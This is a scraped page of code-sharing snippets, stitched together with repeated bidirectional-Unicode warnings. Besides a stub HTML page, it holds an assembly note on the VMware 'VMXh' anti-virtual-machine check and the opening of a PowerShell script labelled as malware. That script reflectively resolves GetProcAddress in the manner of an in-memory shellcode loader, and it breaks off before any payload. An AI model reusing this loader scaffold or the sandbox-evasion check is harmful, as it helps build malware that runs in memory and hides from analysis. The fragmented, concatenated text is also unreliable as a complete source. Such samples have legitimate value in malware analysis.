This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://replit.com/@lengoma/CreepyQuestionableGroupware?v=1#index.html | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<meta name="viewport" content="width=device-width"> | |
<title>replit</title> | |
<link href="style.css" rel="stylesheet" type="text/css" /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; Anti Virtual Machine (VMXh) | |
; | |
; Indicator : | |
; - 564D5868h (Hex) -> VMXh (ASCII) | |
; - ED | |
; | |
; .text:100061DB ED in eax, dx | |
; .text:100061DC 81 FB 68 58 4D 56 cmp ebx, 'VMXh' | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Malware code that was written in spaces and tabs. | |
Set-StrictMode -Version 2 | |
$DoIt = @' | |
function func_get_proc_address { | |
Param ($var_module, $var_procedure) | |
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) | |
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) |